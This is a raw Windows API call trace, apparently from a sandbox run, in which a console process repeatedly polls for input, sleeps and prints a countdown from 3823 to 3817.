[0262.635] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6061
[0262.635] Sleep (dwMilliseconds=0x64)
[0262.775] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0262.776] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6061
[0262.776] Sleep (dwMilliseconds=0x64)
[0262.916] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0262.916] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6061
[0262.916] Sleep (dwMilliseconds=0x64)
[0263.056] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0263.057] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6061
[0263.057] Sleep (dwMilliseconds=0x64)
[0263.166] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0263.166] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6061
[0263.166] Sleep (dwMilliseconds=0x64)
[0263.274] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0263.275] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6061
[0263.275] Sleep (dwMilliseconds=0x64)
[0263.384] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0263.384] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6061
[0263.384] Sleep (dwMilliseconds=0x64)
[0263.493] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0263.493] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6062
[0263.493] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083823") returned 8
[0263.493] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0263.493] __iob_func () returned 0x757a2900
[0263.493] _fileno (_File=0x757a2920) returned 1
[0263.493] _errno () returned 0x5507d8
[0263.493] _get_osfhandle (_FileHandle=1) returned 0x4c
[0263.493] _errno () returned 0x5507d8
[0263.493] GetFileType (hFile=0x4c) returned 0x2
[0263.493] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0263.494] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0263.494] lstrlenW (lpString="\x08\x08\x08\x083823") returned 8
[0263.602] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0263.602] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6062
[0263.602] Sleep (dwMilliseconds=0x64)
[0263.712] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0263.712] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6062
[0263.712] Sleep (dwMilliseconds=0x64)
[0263.821] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0263.821] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6062
[0263.821] Sleep (dwMilliseconds=0x64)
[0263.930] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0263.930] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6062
[0263.930] Sleep (dwMilliseconds=0x64)
[0264.039] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0264.039] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6062
[0264.039] Sleep (dwMilliseconds=0x64)
[0264.148] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0264.149] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6062
[0264.149] Sleep (dwMilliseconds=0x64)
[0264.258] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0264.258] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6062
[0264.258] Sleep (dwMilliseconds=0x64)
[0264.367] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0264.367] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6062
[0264.367] Sleep (dwMilliseconds=0x64)
[0264.476] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0264.476] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6063
[0264.476] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083822") returned 8
[0264.476] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0264.476] __iob_func () returned 0x757a2900
[0264.476] _fileno (_File=0x757a2920) returned 1
[0264.476] _errno () returned 0x5507d8
[0264.476] _get_osfhandle (_FileHandle=1) returned 0x4c
[0264.476] _errno () returned 0x5507d8
[0264.476] GetFileType (hFile=0x4c) returned 0x2
[0264.477] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0264.477] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0264.477] lstrlenW (lpString="\x08\x08\x08\x083822") returned 8
[0264.585] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0264.585] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6063
[0264.585] Sleep (dwMilliseconds=0x64)
[0264.694] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0264.695] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6063
[0264.695] Sleep (dwMilliseconds=0x64)
[0264.803] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0264.804] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6063
[0264.804] Sleep (dwMilliseconds=0x64)
[0264.913] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0264.913] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6063
[0264.913] Sleep (dwMilliseconds=0x64)
[0265.022] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0265.022] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6063
[0265.022] Sleep (dwMilliseconds=0x64)
[0265.131] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0265.131] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6063
[0265.131] Sleep (dwMilliseconds=0x64)
[0265.242] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0265.242] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6063
[0265.242] Sleep (dwMilliseconds=0x64)
[0265.349] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0265.350] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6063
[0265.350] Sleep (dwMilliseconds=0x64)
[0265.459] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0265.459] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6064
[0265.459] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083821") returned 8
[0265.459] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0265.459] __iob_func () returned 0x757a2900
[0265.459] _fileno (_File=0x757a2920) returned 1
[0265.459] _errno () returned 0x5507d8
[0265.459] _get_osfhandle (_FileHandle=1) returned 0x4c
[0265.459] _errno () returned 0x5507d8
[0265.459] GetFileType (hFile=0x4c) returned 0x2
[0265.459] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0265.459] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0265.460] lstrlenW (lpString="\x08\x08\x08\x083821") returned 8
[0265.568] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0265.568] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6064
[0265.568] Sleep (dwMilliseconds=0x64)
[0265.677] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0265.677] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6064
[0265.677] Sleep (dwMilliseconds=0x64)
[0265.786] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0265.786] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6064
[0265.787] Sleep (dwMilliseconds=0x64)
[0265.895] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0265.896] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6064
[0265.896] Sleep (dwMilliseconds=0x64)
[0266.005] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0266.005] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6064
[0266.005] Sleep (dwMilliseconds=0x64)
[0266.114] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0266.114] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6064
[0266.114] Sleep (dwMilliseconds=0x64)
[0266.232] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0266.232] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6064
[0266.232] Sleep (dwMilliseconds=0x64)
[0266.332] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0266.332] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6064
[0266.332] Sleep (dwMilliseconds=0x64)
[0266.441] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0266.442] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6064
[0266.442] Sleep (dwMilliseconds=0x64)
[0266.551] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0266.551] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6065
[0266.551] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083820") returned 8
[0266.551] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0266.551] __iob_func () returned 0x757a2900
[0266.551] _fileno (_File=0x757a2920) returned 1
[0266.551] _errno () returned 0x5507d8
[0266.551] _get_osfhandle (_FileHandle=1) returned 0x4c
[0266.551] _errno () returned 0x5507d8
[0266.551] GetFileType (hFile=0x4c) returned 0x2
[0266.551] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0266.551] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0266.552] lstrlenW (lpString="\x08\x08\x08\x083820") returned 8
[0266.660] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0266.660] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6065
[0266.660] Sleep (dwMilliseconds=0x64)
[0266.769] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0266.769] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6065
[0266.769] Sleep (dwMilliseconds=0x64)
[0266.878] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0266.878] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6065
[0266.879] Sleep (dwMilliseconds=0x64)
[0266.987] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0266.988] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6065
[0266.988] Sleep (dwMilliseconds=0x64)
[0267.097] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0267.097] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6065
[0267.097] Sleep (dwMilliseconds=0x64)
[0267.212] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0267.212] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6065
[0267.212] Sleep (dwMilliseconds=0x64)
[0267.315] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0267.315] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6065
[0267.315] Sleep (dwMilliseconds=0x64)
[0267.424] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0267.425] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6065
[0267.425] Sleep (dwMilliseconds=0x64)
[0267.534] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0267.534] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6066
[0267.534] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083819") returned 8
[0267.534] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0267.534] __iob_func () returned 0x757a2900
[0267.534] _fileno (_File=0x757a2920) returned 1
[0267.534] _errno () returned 0x5507d8
[0267.534] _get_osfhandle (_FileHandle=1) returned 0x4c
[0267.534] _errno () returned 0x5507d8
[0267.534] GetFileType (hFile=0x4c) returned 0x2
[0267.534] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0267.534] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0267.534] lstrlenW (lpString="\x08\x08\x08\x083819") returned 8
[0267.643] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0267.643] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6066
[0267.643] Sleep (dwMilliseconds=0x64)
[0267.752] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0267.752] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6066
[0267.752] Sleep (dwMilliseconds=0x64)
[0267.861] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0267.861] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6066
[0267.861] Sleep (dwMilliseconds=0x64)
[0267.970] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0267.970] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6066
[0267.971] Sleep (dwMilliseconds=0x64)
[0268.080] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0268.080] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6066
[0268.080] Sleep (dwMilliseconds=0x64)
[0268.189] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0268.189] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6066
[0268.189] Sleep (dwMilliseconds=0x64)
[0268.298] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0268.298] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6066
[0268.298] Sleep (dwMilliseconds=0x64)
[0268.407] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0268.407] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6066
[0268.407] Sleep (dwMilliseconds=0x64)
[0268.516] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0268.517] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6067
[0268.517] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083818") returned 8
[0268.517] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0268.517] __iob_func () returned 0x757a2900
[0268.517] _fileno (_File=0x757a2920) returned 1
[0268.517] _errno () returned 0x5507d8
[0268.517] _get_osfhandle (_FileHandle=1) returned 0x4c
[0268.517] _errno () returned 0x5507d8
[0268.517] GetFileType (hFile=0x4c) returned 0x2
[0268.517] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0268.517] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0268.517] lstrlenW (lpString="\x08\x08\x08\x083818") returned 8
[0268.628] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0268.628] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6067
[0268.628] Sleep (dwMilliseconds=0x64)
[0268.735] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0268.735] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6067
[0268.735] Sleep (dwMilliseconds=0x64)
[0268.844] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0268.844] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6067
[0268.844] Sleep (dwMilliseconds=0x64)
[0268.953] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0268.953] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6067
[0268.953] Sleep (dwMilliseconds=0x64)
[0269.062] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0269.062] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6067
[0269.063] Sleep (dwMilliseconds=0x64)
[0269.171] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0269.172] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6067
[0269.172] Sleep (dwMilliseconds=0x64)
[0269.282] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0269.283] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6067
[0269.283] Sleep (dwMilliseconds=0x64)
[0269.390] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0269.390] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6067
[0269.390] Sleep (dwMilliseconds=0x64)
[0269.499] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0269.499] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6068
[0269.499] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083817") returned 8
[0269.499] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0269.499] __iob_func () returned 0x757a2900
[0269.499] _fileno (_File=0x757a2920) returned 1
[0269.500] _errno () returned 0x5507d8
[0269.500] _get_osfhandle (_FileHandle=1) returned 0x4c
[0269.500] _errno () returned 0x5507d8
[0269.500] GetFileType (hFile=0x4c) returned 0x2
[0269.500] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0269.500] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0269.500] lstrlenW (lpString="\x08\x08\x08\x083817") returned 8
[0269.608] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0269.609] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6068
[0269.609] Sleep (dwMilliseconds=0x64)
[0269.718] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0269.718] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6068
[0269.718] Sleep (dwMilliseconds=0x64)
